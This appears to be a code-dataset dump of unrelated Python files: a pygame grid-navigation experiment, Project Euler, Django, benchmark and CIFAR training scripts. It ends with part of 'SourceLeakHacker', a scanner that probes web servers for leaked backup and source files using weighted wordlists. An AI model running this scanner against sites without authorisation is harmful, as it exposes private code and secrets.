    Progress toward a target is how much the step shrinks the Manhattan
    distance from that target.
    """
    progressA = calculateGridDis(targetGridA, originGrid) - calculateGridDis(targetGridA, aimGrid)
    progressB = calculateGridDis(targetGridB, originGrid) - calculateGridDis(targetGridB, aimGrid)
    if progressA > progressB:
        return 1
    if progressB > progressA:
        return 2
    return 0
def checkTerminationOfTrial(bean1Grid, bean2Grid, humanGrid):
    """False once the player stands on either bean (trial over), else True."""
    reached = any(calculateGridDis(humanGrid, bean) == 0
                  for bean in (bean1Grid, bean2Grid))
    return not reached
class SingleGoalTrial():
    """One trial with a single target bean.

    Shows a fixation cross, then repeatedly steps the player via
    `controller` — with noise injected on `designValues` randomly chosen
    steps — until the bean is reached, and returns the recorded data.
    """
    def __init__(self, controller, drawNewState, drawText, normalNoise, checkBoundary):
        self.controller = controller        # (player, bean, bean) -> (aim grid, aim action)
        self.drawNewState = drawNewState    # renders beans, player and obstacles
        self.drawText = drawText            # renders the fixation cross
        self.normalNoise = normalNoise      # perturbs the action on designated steps
        self.checkBoundary = checkBoundary  # clamps the player inside the board

    def __call__(self, beanGrid, playerGrid, designValues):
        obstacles = []
        initialPlayerGrid = playerGrid
        reactionTime = list()
        trajectory = [initialPlayerGrid]
        results = co.OrderedDict()
        aimActionList = list()
        # Steps on the direct path to the bean; `designValues` noise steps
        # are sampled from [2, totalStep).
        totalStep = int(np.linalg.norm(np.array(playerGrid) - np.array(beanGrid), ord=1))
        noiseStep = random.sample(list(range(2, totalStep)), designValues)
        stepCount = 0
        goalList = list()
        # Fixation cross, then the initial scene.
        self.drawText("+", [0, 0, 0], [7, 7])
        pg.time.wait(1300)
        self.drawNewState(beanGrid, beanGrid, initialPlayerGrid, obstacles)
        pg.event.set_allowed([pg.KEYDOWN, pg.KEYUP, pg.QUIT])
        realPlayerGrid = initialPlayerGrid
        pause = True
        initialTime = time.get_ticks()
        while pause:
            aimPlayerGrid, aimAction = self.controller(realPlayerGrid, beanGrid, beanGrid)
            # Reaction times are cumulative milliseconds since trial start.
            reactionTime.append(time.get_ticks() - initialTime)
            stepCount = stepCount + 1
            noisePlayerGrid, realAction = self.normalNoise(realPlayerGrid, aimAction, noiseStep, stepCount)
            realPlayerGrid = self.checkBoundary(noisePlayerGrid)
            self.drawNewState(beanGrid, beanGrid, realPlayerGrid, obstacles)
            trajectory.append(list(realPlayerGrid))
            aimActionList.append(aimAction)
            pause = checkTerminationOfTrial(beanGrid, beanGrid, realPlayerGrid)
        pg.time.wait(500)
        pg.event.set_blocked([pg.KEYDOWN, pg.KEYUP])
        # Values are stringified for flat CSV-style logging downstream.
        results["reactionTime"] = str(reactionTime)
        results["trajectory"] = str(trajectory)
        results["aimAction"] = str(aimActionList)
        results["noisePoint"] = str(noiseStep)
        return results
class NormalTrial():
    """Runs one two-bean trial: the controller chooses moves between two
    candidate goals while per-step goal inferences, noise, and obstacle
    collisions are logged."""
    def __init__(self, controller, drawNewState, drawText, normalNoise, checkBoundary):
        # All collaborators are injected callables (drawing, noise, clamping).
        self.controller = controller
        self.drawNewState = drawNewState
        self.drawText = drawText
        self.normalNoise = normalNoise
        self.checkBoundary = checkBoundary
    def __call__(self, bean1Grid, bean2Grid, playerGrid, obstacles, designValues):
        """Run the trial and return an OrderedDict of stringified logs
        (reaction times, trajectory, aim grids/actions, noise steps, goals)."""
        initialPlayerGrid = playerGrid
        reactionTime = list()
        trajectory = [initialPlayerGrid]
        results = co.OrderedDict()
        aimActionList = list()
        aimPlayerGridList = []
        # Noise indices are drawn within the shorter of the two bean distances.
        leastStep = min([calculateGridDis(playerGrid, beanGrid) for beanGrid in [bean1Grid, bean2Grid]])
        noiseStep = sorted(random.sample(list(range(2, leastStep)), designValues))
        stepCount = 0
        goalList = list()
        # Fixation cross, then the initial scene.
        self.drawText("+", [0, 0, 0], [7, 7])
        pg.time.wait(1300)
        self.drawNewState(bean1Grid, bean2Grid, initialPlayerGrid, obstacles)
        pg.event.set_allowed([pg.KEYDOWN, pg.KEYUP, pg.QUIT])
        realPlayerGrid = initialPlayerGrid
        pause = True
        initialTime = time.get_ticks()
        while pause:
            aimPlayerGrid, aimAction = self.controller(realPlayerGrid, bean1Grid, bean2Grid)
            reactionTime.append(time.get_ticks() - initialTime)
            # Infer which bean this step's aim is heading toward (0 = tie).
            goal = inferGoal(trajectory[-1], aimPlayerGrid, bean1Grid, bean2Grid)
            goalList.append(goal)
            stepCount = stepCount + 1
            noisePlayerGrid, realAction = self.normalNoise(realPlayerGrid, aimAction, noiseStep, stepCount)
            # Moving into an obstacle keeps the player on the previous grid.
            if noisePlayerGrid in obstacles:
                noisePlayerGrid = tuple(trajectory[-1])
            realPlayerGrid = self.checkBoundary(noisePlayerGrid)
            self.drawNewState(bean1Grid, bean2Grid, realPlayerGrid, obstacles)
            trajectory.append(list(realPlayerGrid))
            aimActionList.append(aimAction)
            aimPlayerGridList.append(aimPlayerGrid)
            # False once the player sits on either bean, which ends the loop.
            pause = checkTerminationOfTrial(bean1Grid, bean2Grid, realPlayerGrid)
        pg.time.wait(500)
        pg.event.set_blocked([pg.KEYDOWN, pg.KEYUP])
        results["reactionTime"] = str(reactionTime)
        results["trajectory"] = str(trajectory)
        results["aimPlayerGridList"] = str(aimPlayerGridList)
        results["aimAction"] = str(aimActionList)
        results["noisePoint"] = str(noiseStep)
        results["goal"] = str(goalList)
        return results
| [
"shaozhecheng@outlook.com"
] | shaozhecheng@outlook.com |
f8b009384d048023c27af00144f2eed20a7e0cf7 | 64363c8f80d760045996cbda1e0f578c07378c5b | /1-50/problem12/problem12.py | fce34ccd85da4c311a28f9a29d21512305111dbb | [] | no_license | ducngtuan/euler | ad1dd05cb044a067d0ab029ea7531128260b0d11 | c362d134dff02f639eae1c38508bc0f5cfdba07b | refs/heads/master | 2020-12-24T15:58:56.125110 | 2013-02-03T12:22:10 | 2013-02-03T12:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | def generate(n, acc=0):
if n == 0:
return acc
if n % 2 == 1:
return generate(n - 1, n + acc)
return acc + n * (n + 1) / 2
def divisors_count(n):
    """Return the number of positive divisors of n (n >= 1).

    Divisors pair up as (x, n / x) around sqrt(n): counting every x in
    [1, sqrt(n)] that divides n and doubling covers both halves of each
    pair.  A perfect square's root is its own partner, so it would be
    double-counted and must be subtracted once.

    Bug fixed: the original iterated range(1, sqrt), which excludes the
    integer root itself, so e.g. divisors_count(12) returned 4 instead
    of 6 whenever floor(sqrt(n)) divides n without n being a square.
    """
    root = int(n ** 0.5)
    count = 2 * sum(1 for x in range(1, root + 1) if n % x == 0)
    if root * root == n:
        count -= 1  # the root was counted twice above
    return count
# Project Euler #12: scan triangle numbers generate(i) until one has more
# than 500 divisors, then print its index and value.
i = 1
while divisors_count(generate(i)) <= 500: i += 1
print("%d: %d" % (i, generate(i))) # 12375 - 76576500
"duc.ngtuan@googlemail.com"
] | duc.ngtuan@googlemail.com |
a07da680c32548d6d654f4d01f59d3f272342446 | 6e2dcf256edb612c76e734ced750285d8fcc3233 | /FirstProject/urls.py | ed0bdf1c26ceec833f9828075af4f3c449c0b58b | [] | no_license | ShubhamWorks78/DjangoFirst | 2a49f4372caed0208959281143c25fdcf2a1cb84 | 6f853d305bb7fa645f6d3817b33b53de151b29e6 | refs/heads/master | 2021-05-02T15:57:17.979561 | 2016-11-01T20:07:08 | 2016-11-01T20:07:08 | 72,571,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 820 | py | """FirstProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include,url
from django.contrib import admin
# Root URL routes: the Django admin plus everything under /music/ delegated
# to the `music` app's own URLconf.
urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url(r'^music/',include('music.urls')),
]
| [
"2014UGEC@nitjsr.ac.in"
] | 2014UGEC@nitjsr.ac.in |
24bfed80ab1caa8cbdcf840494dd356d0bacce80 | 6bca587e888ad96062e7d74f96e28e05f2da51a6 | /android/device/actions/common/hardware/libcamera/tests/camerahal_test_scripts/camera_smoketest/camera_smoketest_0011.py | d158fa5ccec3b848d9ec519d7db1d050f485d942 | [] | no_license | ChrisP-Android/android-actions | 07a3bd732cb731ac6176b768b1ce19e5f520a303 | ac57ff55fbca5f4e3cf8851b17c42dafa2f9f46c | refs/heads/master | 2020-12-14T18:51:47.340113 | 2015-10-28T17:42:12 | 2015-10-28T17:42:12 | 44,614,459 | 1 | 0 | null | 2015-10-20T15:07:25 | 2015-10-20T15:07:25 | null | UTF-8 | Python | false | false | 772 | py |
import time
from time import sleep
import random
import sys
from config import *
from camera_smoketest_config import *
############################################################
# Smoke test: record TestIterTimes short clips on each camera (front/back),
# switching cameras between the two passes.  Runs under the monkeyrunner-style
# `device` driver imported from the config modules (Python 2 syntax).
print '*******************************************************************'
print 'recording %d times'% TestIterTimes
print '*******************************************************************'
device.startActivity(component=runComponent)
wait(open_wait)
for s in range(2):
    RestoreDefaults()
    wait(2)
    # Tap the camcorder-mode button to enter video recording mode.
    device.touch( CamcorderMode.x, CamcorderMode.y, 'DOWN_AND_UP')
    sleep(2)
    for i in range(TestIterTimes):
        print 'recording No.%d'%i
        StartRecording();
        # Record for a random 1-5 seconds before stopping.
        wait(random.randint(1,5));
        StopRecording();
    SwitchCamera()
    wait(2)
exit()
| [
"lee.li@lemaker.com"
] | lee.li@lemaker.com |
f55df027f5a380a2302722b0a432c76857f85315 | a1a43879a2da109d9fe8d9a75f4fda73f0d7166b | /api/tests/equal_all.py | 1f1a1f3cf9a2c23dd214b96ee1e53b5c0fc00069 | [] | no_license | PaddlePaddle/benchmark | a3ed62841598d079529c7440367385fc883835aa | f0e0a303e9af29abb2e86e8918c102b152a37883 | refs/heads/master | 2023-09-01T13:11:09.892877 | 2023-08-21T09:32:49 | 2023-08-21T09:32:49 | 173,032,424 | 78 | 352 | null | 2023-09-14T05:13:08 | 2019-02-28T03:14:16 | Python | UTF-8 | Python | false | false | 1,661 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common_import import *
@benchmark_registry.register("equal_all")
class EqualAllConfig(APIConfig):
    """Benchmark configuration for the `equal_all` op; the TensorFlow run
    is disabled for this op (run_tf = False)."""
    def __init__(self):
        super(EqualAllConfig, self).__init__("equal_all")
        self.run_tf = False
@benchmark_registry.register("equal_all")
class PaddleEqualAll(PaddleOpBenchmarkBase):
    """Paddle-side benchmark graph for paddle.equal_all."""
    def build_graph(self, config):
        """Create inputs from the config's shapes/dtypes, apply equal_all,
        and record the feed/fetch lists for the benchmark runner."""
        lhs = self.variable(name='x', shape=config.x_shape, dtype=config.x_dtype)
        rhs = self.variable(name='y', shape=config.y_shape, dtype=config.y_dtype)
        self.feed_list = [lhs, rhs]
        is_equal = paddle.equal_all(x=lhs, y=rhs)
        self.fetch_list = [is_equal]
@benchmark_registry.register("equal_all")
class TorchEqualAll(PytorchOpBenchmarkBase):
    """PyTorch-side benchmark graph mirroring paddle.equal_all."""
    def build_graph(self, config):
        """torch.equal returns a Python bool, so wrap it back into a tensor
        before adding it to the fetch list."""
        lhs = self.variable(name='x', shape=config.x_shape, dtype=config.x_dtype)
        rhs = self.variable(name='y', shape=config.y_shape, dtype=config.y_dtype)
        same = torch.tensor(torch.equal(input=lhs, other=rhs))
        self.feed_list = [lhs, rhs]
        self.fetch_list = [same]
| [
"noreply@github.com"
] | noreply@github.com |
a100678014c55766c07b94ae81cf67b691c11c59 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-sblp/sblp_ut=3.5_rd=1_rw=0.04_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=6/sched.py | 3605875026286563e51a9292de1d94125c66f6dc | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | -S 1 -X RUN -Q 0 -L 2 106 400
-S 0 -X RUN -Q 0 -L 2 86 400
-S 0 -X RUN -Q 0 -L 2 74 250
-S 0 -X RUN -Q 0 -L 2 59 250
-S 2 -X RUN -Q 1 -L 1 54 200
-S 3 -X RUN -Q 1 -L 1 44 175
-S 2 -X RUN -Q 1 -L 1 40 200
-S 2 -X RUN -Q 1 -L 1 37 125
-S 4 -X RUN -Q 2 -L 1 35 125
-S 4 -X RUN -Q 2 -L 1 33 125
-S 4 -X RUN -Q 2 -L 1 32 300
-S 4 -X RUN -Q 2 -L 1 30 100
-S 5 -X RUN -Q 3 -L 1 30 300
-S 5 -X RUN -Q 3 -L 1 28 150
-S 5 -X RUN -Q 3 -L 1 24 300
-S 5 -X RUN -Q 3 -L 1 19 125
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
346858d357244e5d68bd63d2933ad76895e0112c | 5f4cb8907900ebb740b5bd22c932ef7bbb847eb9 | /train.py | 0239e8b311f96c5390e162302512fb6528de344a | [] | no_license | DeeperCS/distillation | b3c13965142683324ae7846c7442f3da0f2739ac | a42a34ee17ccce8fc9319231d86a0ffd7f3d013d | refs/heads/master | 2022-12-20T21:36:02.750087 | 2020-09-28T09:53:40 | 2020-09-28T09:53:40 | 299,263,677 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,141 | py | from __future__ import print_function
import argparse
import numpy as np
import os
import shutil
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
from models import resnet
from models import densenet
from utils import get_logger, makedirs
# torch.cuda.set_device(3)
# Training settings: CLI flags for dataset, optimization hyperparameters,
# checkpointing, and architecture selection (resnet depth vs densenet knobs).
parser = argparse.ArgumentParser(description='PyTorch CIFAR training')
parser.add_argument('--dataset', type=str, default='cifar100',
                    help='training dataset (default: cifar100)')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
                    help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
                    help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=160, metavar='N',
                    help='number of epochs to train (default: 160)')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
                    help='manual epoch number (useful on restarts)')
parser.add_argument('--lr', type=float, default=0.1, metavar='LR',
                    help='learning rate (default: 0.1)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
                    help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
                    metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
                    help='path to latest checkpoint (default: none)')
parser.add_argument('--no-cuda', action='store_true', default=False,
                    help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
                    help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
                    help='how many batches to wait before logging training status')
parser.add_argument('--save', default='./experiment1', type=str, metavar='PATH',
                    help='path to save model (default: current directory)')
parser.add_argument('--arch', default='resnet', type=str,
                    help='architecture to use')
parser.add_argument('--data', default='../ESNB-cifar/', type=str,
                    help='path of dataset')
parser.add_argument('--depth', default=20, type=int,
                    help='depth of the neural network')
parser.add_argument('--depth_dense', type=int, default=100, help='Model depth.')
parser.add_argument('--growthRate', type=int, default=12, help='Growth rate for DenseNet.')
parser.add_argument('--compressionRate', type=int, default=0.5, help='Compression Rate (theta) for DenseNet.')
parser.add_argument('--drop', '--dropout', default=0, type=float,
                    metavar='Dropout', help='Dropout ratio')
args = parser.parse_args()
# Logs and checkpoints both go under args.save.
makedirs(args.save)
logger = get_logger(logpath=os.path.join(args.save, 'logs'), filepath=os.path.abspath(__file__))
logger.info(args)
args.cuda = not args.no_cuda and torch.cuda.is_available()
# Three resnet stages, each with (depth-2)/6 basic blocks.
num_blocks = [(args.depth-2)//(3*2),] * 3
torch.manual_seed(args.seed)
if args.cuda:
    torch.cuda.manual_seed(args.seed)
data_path = args.data
kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}
# CIFAR-10 vs CIFAR-100 loaders; training uses pad+crop+flip augmentation,
# testing only normalization (same mean/std constants for both datasets).
num_classes = 10
if args.dataset == 'cifar10':
    train_loader = torch.utils.data.DataLoader(
        datasets.CIFAR10('../data.cifar10', train=True, download=True,
                     transform=transforms.Compose([
                        transforms.Pad(4),
                        transforms.RandomCrop(32),
                        transforms.RandomHorizontalFlip(),
                        transforms.ToTensor(),
                        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
                    ])),
        batch_size=args.batch_size, shuffle=True, **kwargs)
    test_loader = torch.utils.data.DataLoader(
        datasets.CIFAR10('../data.cifar10', train=False, transform=transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
        ])),
        batch_size=args.test_batch_size, shuffle=True, **kwargs)
else:
    num_classes = 100
    train_loader = torch.utils.data.DataLoader(
        datasets.CIFAR100(data_path+'data.cifar100', train=True, download=False,
                     transform=transforms.Compose([
                        transforms.Pad(4),
                        transforms.RandomCrop(32),
                        transforms.RandomHorizontalFlip(),
                        transforms.ToTensor(),
                        transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
                    ])),
        batch_size=args.batch_size, shuffle=True, **kwargs)
    test_loader = torch.utils.data.DataLoader(
        datasets.CIFAR100(data_path+'data.cifar100', train=False, transform=transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
        ])),
        batch_size=args.test_batch_size, shuffle=True, **kwargs)
# Build the selected architecture, move it to GPU if available, and
# optionally resume training state from a checkpoint file.
if args.arch == "resnet":
    model = resnet.resnet(depth=args.depth, num_classes=num_classes, num_blocks=num_blocks)
else:
    model = densenet.densenet(
        num_classes=num_classes,
        depth=args.depth_dense,
        block=densenet.Bottleneck,
        growthRate=args.growthRate,
        compressionRate=args.compressionRate,
        dropRate=args.drop,
    )
logger.info(model)
if args.cuda:
    model.cuda()
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
if args.resume:
    if os.path.isfile(args.resume):
        print("=> loading checkpoint '{}'".format(args.resume))
        checkpoint = torch.load(args.resume)
        # Restores epoch counter, best accuracy, model weights, and optimizer state.
        args.start_epoch = checkpoint['epoch']
        best_prec1 = checkpoint['best_prec1']
        model.load_state_dict(checkpoint['state_dict'])
        optimizer.load_state_dict(checkpoint['optimizer'])
        logger.info("=> loaded checkpoint '{}' (epoch {}) Prec1: {:f}"
              .format(args.resume, checkpoint['epoch'], best_prec1))
    else:
        logger.info("=> no checkpoint found at '{}'".format(args.resume))
def train(epoch):
    """Run one training epoch over train_loader, logging the batch loss
    every args.log_interval batches.

    Uses the module-level model, optimizer, train_loader, args, logger.
    NOTE(review): avg_loss and train_acc are accumulated but never
    reported or returned.
    """
    model.train()
    avg_loss = 0.
    train_acc = 0.
    for batch_idx, (data, target) in enumerate(train_loader):
        if args.cuda:
            data, target = data.cuda(), target.cuda()
        data, target = Variable(data), Variable(target)
        optimizer.zero_grad()
        output = model(data)
        loss = F.cross_entropy(output, target)
        avg_loss += loss.item()
        # argmax over class logits for a running accuracy count.
        pred = output.data.max(1, keepdim=True)[1]
        train_acc += pred.eq(target.data.view_as(pred)).cpu().sum()
        loss.backward()
        optimizer.step()
        if batch_idx % args.log_interval == 0:
            logger.info('Train Epoch: {} [{}/{} ({:.1f}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx * len(data), len(train_loader.dataset),
                100. * batch_idx / len(train_loader), loss.item()))
def test():
    """Evaluate the model on test_loader and return accuracy as a
    percentage (float).  Also logs average loss and accuracy."""
    model.eval()
    test_loss = 0
    correct = 0
    total = 0
    with torch.no_grad():
        for data, target in test_loader:
            if args.cuda:
                data, target = data.cuda(), target.cuda()
            data, target = Variable(data), Variable(target)
            output = model(data)
            test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss
            pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
            correct += pred.eq(target.data.view_as(pred)).cpu().sum().item()
            total += target.size(0)
    # Per-sample average loss over the whole test set.
    test_loss /= total
    logger.info('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)'.format(
        test_loss, correct, total, 100. * correct / total))
    return (100. * correct / total)
def save_checkpoint(state, is_best, filepath):
    """Persist `state` as checkpoint.pth.tar inside `filepath`; when
    `is_best` is truthy, also duplicate it as model_best.pth.tar."""
    checkpoint_path = os.path.join(filepath, 'checkpoint.pth.tar')
    torch.save(state, checkpoint_path)
    if is_best:
        best_path = os.path.join(filepath, 'model_best.pth.tar')
        shutil.copyfile(checkpoint_path, best_path)
# Main loop: step-decay the LR by 10x at 25%/50%/75% of total epochs
# (int epoch compares equal to the float products), train, evaluate, and
# checkpoint every epoch, keeping a copy of the best model.
best_prec1 = 0.
for epoch in range(args.start_epoch, args.epochs):
    if epoch in [args.epochs*0.25, args.epochs*0.5, args.epochs*0.75]:
        for param_group in optimizer.param_groups:
            param_group['lr'] *= 0.1
    train(epoch)
    prec1 = test()
    is_best = prec1 > best_prec1
    best_prec1 = max(prec1, best_prec1)
    logger.info("Best acc:{}\n".format(best_prec1))
    save_checkpoint({
        'epoch': epoch + 1,
        'state_dict': model.state_dict(),
        'best_prec1': best_prec1,
        'optimizer': optimizer.state_dict(),
        'cfg': model.cfg
    }, is_best, filepath=args.save)
| [
"zy3381@vip.qq.com"
] | zy3381@vip.qq.com |
3f27767e32d95a71d36747e6db0b0d8e9bfabfc9 | f0a65d21d5ba16888f131fe99ed8baf0a85cf7dd | /pygmsh/volume_base.py | d3a22878fde32ff32a8b8924022e7a8096963a9b | [
"MIT"
] | permissive | mjredmond/pygmsh | d4a1e4e418af931eccbe73db01813a70efc2924a | 972e1164d77ecbf6c2b50b93fec9dc48c8d913e6 | refs/heads/master | 2021-01-19T07:52:53.057151 | 2017-04-06T09:48:21 | 2017-04-06T09:48:21 | 87,581,937 | 0 | 0 | null | 2017-04-07T19:52:56 | 2017-04-07T19:52:56 | null | UTF-8 | Python | false | false | 246 | py | # -*- coding: utf-8 -*-
#
class VolumeBase(object):
    """Base class for volumes; hands out sequential ids 'v0', 'v1', ...
    whenever the caller does not supply one."""
    # Class-wide counter backing the auto-generated ids; only advanced
    # when an id is actually auto-assigned.
    _ID = 0
    def __init__(self, id=None):
        if id:
            self.id = id
            return
        self.id = 'v%d' % VolumeBase._ID
        VolumeBase._ID += 1
| [
"nico.schloemer@gmail.com"
] | nico.schloemer@gmail.com |
d220286422890246a7bfe05a56449454d42fa1d7 | 156d6f2187d875429482dd39b0daff7870b5b716 | /data/csv_to_json.py | 25c4f16b0b749b3f0d0504723000253414ae1219 | [] | no_license | ahardjasa/code2015 | 57ce282821ef9e3671022eaaae01941b8016d9ab | 1d2ab48698b259beb4d461e31c4b0db49b871363 | refs/heads/master | 2020-04-11T04:28:01.454528 | 2016-01-04T06:30:45 | 2016-01-04T06:30:45 | 31,090,410 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 686 | py | #!/usr/bin/env python3
import sys
import codecs
import csv
import json
def clean(text):
    """Strip surrounding whitespace from a CSV cell and coerce it to a
    float when it parses as one; otherwise return the stripped string."""
    stripped = text.strip()
    try:
        value = float(stripped)
    except Exception:
        return stripped
    return value
def main(filename):
    """Stream a latin-1 CSV file to stdout as a JSON object with "cols"
    (the header row) and "rows" (remaining rows, cells passed through
    clean())."""
    with codecs.open(filename, encoding='latin_1') as ifh:
        reader = csv.reader(ifh)
        for i, row in enumerate(reader):
            if i == 0:
                # Header row opens the JSON object and the rows array.
                print('{"cols": ' + json.dumps(row) + ',\n"rows": [')
            else:
                # A leading comma separates rows; the first data row omits it.
                comma = ', '
                if i == 1:
                    comma = ' '
                print(comma + json.dumps([clean(c) for c in row]))
    print(']}')
if __name__ == '__main__':
main(sys.argv[1])
| [
"ngentleman@gmail.com"
] | ngentleman@gmail.com |
049caefa2add1ff042074b59e8aa6f1d1253ec07 | b236cc8f8cb1551467fd7bfdfafd35b760e1beeb | /00-Scanner/01-RemoteFileScanner/01-CodeLeak/SourceLeakHacker/lib/core/dispatcher.py | 2a797bee0b02b44e0877d5be1dae1794d5cb169a | [] | no_license | LANVNAL/MyPentestToolsBox | d3e8fbe78d84878996f9bab663568045dba20f29 | b88c8bc711eb21fb14a06bcf816629477b5604cb | refs/heads/master | 2023-07-24T18:25:28.538528 | 2021-09-07T11:20:27 | 2021-09-07T11:20:27 | 403,949,673 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,176 | py | import sys
import queue
import threading
import time
import requests
from colorama import Style
from lib.util import color
from lib.util import terminal
from lib.context import context
def check(url, foldername, filename, backup, timeout=4):
    """Probe `url` with an HTTP HEAD request and record the outcome.

    On success: stores code/headers/timing in context.result, bumps the
    per-status-code counter in context.statistic, bumps the dictionary
    hit caches for 2xx responses, and prints a colored result line.
    On any failure: records a code-0 result with the exception text,
    logs it, bumps the code-0 counter, and re-raises for the caller.
    All shared structures are guarded by their context locks.
    """
    try:
        start_time = time.time()
        # verify=False: accept self-signed TLS certs on scanned hosts.
        response = requests.head(url, timeout=timeout, verify=False)
        end_time = time.time()
        code = response.status_code
        if "Content-Length" in response.headers:
            content_length = response.headers["Content-Length"]
        else:
            content_length = "0"
        if "Content-Type" in response.headers:
            content_type = response.headers["Content-Type"]
        else:
            content_type = "UNKNOWN"
        time_used = end_time - start_time
        context.result_lock.acquire()
        context.result[url] = {
            "code":code,
            "headers":response.headers,
            "time":time_used,
            "Content-Length": content_length,
            "Content-Type": content_type,
        }
        context.result_lock.release()
        context.statistic_lock.acquire()
        if code not in context.statistic.keys():
            context.statistic[code] = 0
        context.statistic[code] += 1
        context.statistic_lock.release()
        # Update cache: a hit (2xx) raises the priority of the matched
        # folder/file/backup entries for future scheduling.
        if code >= 200 and code < 300:
            context.foldernames_lock.acquire()
            context.foldernames_cache[foldername] += 1
            context.foldernames_lock.release()
            context.filenames_lock.acquire()
            context.filenames_cache[filename] += 1
            context.filenames_lock.release()
            context.backups_lock.acquire()
            context.backups_cache[backup] += 1
            context.backups_lock.release()
        # Serialize console output so colored lines don't interleave.
        context.screenLock.acquire()
        print(color.projection(code) + "[%d]\t%s\t%02f\t%s\t%s" % (code, content_length, time_used, content_type, url))
        print(Style.RESET_ALL, end="")
        context.screenLock.release()
    except Exception as e:
        # Any failure (network error, timeout, ...) is recorded as code 0.
        code = 0
        context.result_lock.acquire()
        context.result[url] = {
            "code":code,
            "time":0,
            "Content-Length": 0,
            "Content-Type": repr(e).replace(",", "|"),
        }
        context.result_lock.release()
        context.logger.error(e)
        context.statistic_lock.acquire()
        if code not in context.statistic.keys():
            context.statistic[code] = 0
        context.statistic[code] += 1
        context.statistic_lock.release()
        raise e
class Producer(threading.Thread):
    """Daemon thread that loads the weighted dictionaries into the shared
    context caches and enqueues one scan task per (backup-pattern, folder,
    url, filename) combination, highest-weight entries first."""
    def __init__(self, Q, urls, foldernames_file, filenames_file, backups_file, timeout):
        threading.Thread.__init__(self)
        self.daemon = True
        self.Q = Q
        self.urls = urls
        # Each *_file is an open file of "<weight>\t<entry>" lines.
        self.foldernames_file = foldernames_file
        self.filenames_file = filenames_file
        self.backups_file = backups_file
        self.timeout = timeout
    def run(self):
        # Generate tasks for threads
        context.logger.info("Loading dictionaries: 1/3")
        for i in list(self.foldernames_file):
            key = i.split("\t")[1].strip()
            value = int(i.split("\t")[0])
            context.foldernames_lock.acquire()
            context.foldernames_cache[key] = value
            context.foldernames_lock.release()
        context.logger.info("Loading dictionaries: 2/3")
        for i in list(self.filenames_file):
            key = i.split("\t")[1].strip()
            value = int(i.split("\t")[0])
            context.filenames_lock.acquire()
            context.filenames_cache[key] = value
            context.filenames_lock.release()
        context.logger.info("Loading dictionaries: 3/3")
        for i in list(self.backups_file):
            key = i.split("\t")[1].strip()
            value = int(i.split("\t")[0])
            context.backups_lock.acquire()
            context.backups_cache[key] = value
            context.backups_lock.release()
        context.logger.info("Sorting dictionaries...")
        # Iterate entries by descending weight so likely hits come first.
        for backup in sorted(context.backups_cache.items(), key=lambda item:item[1], reverse=True):
            for foldername in sorted(context.foldernames_cache.items(), key=lambda item:item[1], reverse=True):
                for url in self.urls:
                    # Check folder existance
                    folder_url = "{}{}".format(url, foldername[0])
                    skip_flag = False
                    try:
                        response = requests.head(folder_url, timeout=self.timeout, verify=False)
                        code = response.status_code
                        # A 4xx on the folder itself means its files need no scan.
                        if code >= 400 and code < 500:
                            skip_flag = True
                            context.logger.info("Folder({}) not exists, skipping scanning files in this folder.".format(folder_url))
                    except Exception as e:
                        context.logger.error(repr(e))
                    if skip_flag:
